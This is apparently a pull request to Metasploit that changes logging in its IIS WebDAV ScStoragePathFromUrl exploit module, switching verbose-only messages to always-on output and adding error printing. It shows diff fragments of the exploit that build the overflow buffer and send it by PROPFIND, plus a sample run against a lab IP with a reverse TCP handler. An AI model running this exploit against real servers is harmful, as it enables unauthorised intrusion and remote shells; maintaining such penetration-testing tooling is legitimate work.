### PR TITLE
Update iis_webdav_scstoragepathfromurl.rb - Message&Errors display fixed 

### DIFF
--- a/modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb
+++ b/modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb
@@ -186,10 +186,10 @@ class MetasploitModule < Msf::Exploit::Remote
     server_scheme = url.scheme
 
     http_host = "#{server_scheme}://#{server_name}:#{server_port}"
-    vprint_status("Using http_host #{http_host}")
+    print_status("Using http_host #{http_host}")
 
     min_path_len.upto(max_path_len) do |path_len|
-      vprint_status("Trying path length of #{path_len}...")
+      print_status("Trying path length of #{path_len}...")
 
       begin
         buf1 = "<#{http_host}/"
@@ -227,7 +227,7 @@ class MetasploitModule < Msf::Exploit::Remote
         buf1 << payload.encoded
         buf1 << ">"
 
-        vprint_status("Sending payload")
+        print_status("Sending payload")
         res = send_request_raw(
           'method' => 'PROPFIND',
           'headers' => {
@@ -236,18 +236,24 @@ class MetasploitModule < Msf::Exploit::Remote
           },
           'uri' => target_uri.path
         )
+        print_good("Payload sent successfully to the target")
         if res
-          vprint_status("Server returned status #{res.code}")
+          print_status("Server returned status #{res.code}")
           if res.code == 502 || res.code == 400
             next
           elsif session_created?
             return
           else
-            vprint_status("Unknown Response: #{res.code}")
+            print_status("Unknown Response: #{res.code}")
           end
         end
-      rescue ::Errno::ECONNRESET
-        vprint_status("got a connection reset")
+      rescue ::Errno::ECONNRESET => e
+        print_error("#{e.class}: #{e.message}")
+        print_error("got a connection reset")
+        #     rescue => error
+#     print_error(error.class.to_s)
+#      print_error(error.message)
+#      print_error(error.backtrace.join("\n"))
         next
       end
     end


### PR DESCRIPTION
My english is poor，sry （0 . 0）
The old version of this script cannot show any messges when you run: exploit in the lastest version of metasploit, I dont know if any other people facing the same problem，if you do please tell me.
I have changed the print function to print_status ，add some outputs
And Add the errors catch block
Now you can see the error.message!
Verification

List the steps needed to make sure this thing works
use exploit/windows/iis/iis_webdav_scstoragepathfromurl
set rhost 192.168.64.144
exploit

[] Started reverse TCP handler on 192.168.64.150:4444
[] MyTest_Version_Output_text
[] Extracting ServerName and Port
[] Using http_host http://192.168.64.144:80
[] Trying path length of 19...
[] Sending payload
[-] Errno::ECONNRESET: Connection reset by peer
[-] got a connection reset
[*] Exploit completed, but no session was created.